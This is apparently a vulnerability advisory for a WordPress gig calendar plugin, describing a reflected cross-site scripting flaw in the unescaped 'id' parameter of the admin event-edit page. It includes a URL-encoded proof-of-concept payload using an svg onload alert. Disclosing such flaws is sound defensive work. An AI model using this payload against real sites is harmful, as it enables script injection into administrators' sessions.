The plugin does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
https://example.comwp-admin/admin.php?page=mf_gig_calendar&action=edit&id=%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3B%3E%3C%22
iohex
iohex
Yes
2021-08-17 (about 10 months ago)
2021-08-17 (about 10 months ago)
2022-04-09 (about 2 months ago)